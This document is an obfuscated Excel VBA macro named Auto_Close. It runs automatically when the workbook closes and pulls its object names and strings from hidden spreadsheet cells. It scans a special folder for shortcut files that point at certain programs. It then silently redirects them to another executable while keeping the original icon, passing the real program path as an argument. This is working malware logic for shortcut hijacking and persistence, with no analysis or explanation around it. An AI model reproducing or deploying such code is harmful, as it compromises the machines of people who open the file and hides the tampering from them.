Sub Auto_Close()
Set mTfkUK = CreateObject(activeSheet.Range("AX58").value)
Set MsHJxSQqd = CreateObject(activeSheet.Range("AY58").value)
Set gGNRhv = MsHJxSQqd.GetFolder(mTfkUK.SpecialFolders(activeSheet.Range("BA58").value))
For Each pecVzCt In gGNRhv.Files
If(InStr(Lcase(pecVzCt), ".lnk")) Then
Set qNDwbXxW = mTfkUK.CreateShortcut(mTfkUK.SPecialFolders(activeSheet.Range("BA58").value) & "\" & pecVzCt.name)
If(InStr(Lcase(qNDwbXxW.targetPath), activeSheet.Range("BE58").value) or InStr(Lcase(qNDwbXxW.targetPath), activeSheet.Range("BH58").value) or InStr(Lcase(qNDwbXxW.targetPath), activeSheet.Range("BI58").value)) Then
qNDwbXxW.IconLocation = qNDwbXxW.targetpath
qNDwbXxW.arguments = "-w " & activeSheet.Range("BJ58").Value & qNDwbXxW.targetPath & "'" & activeSheet.Range("BK58").Value
qNDwbXxW.targetpath = left(CurDir, InStr(CurDir, ":")-1) & activeSheet.Range("BN58").value
if(Len(qNDwbXxW.arguments) < 1023) Then
qNDwbXxW.save
end if
end if
end if
next pecVzCt
End Sub
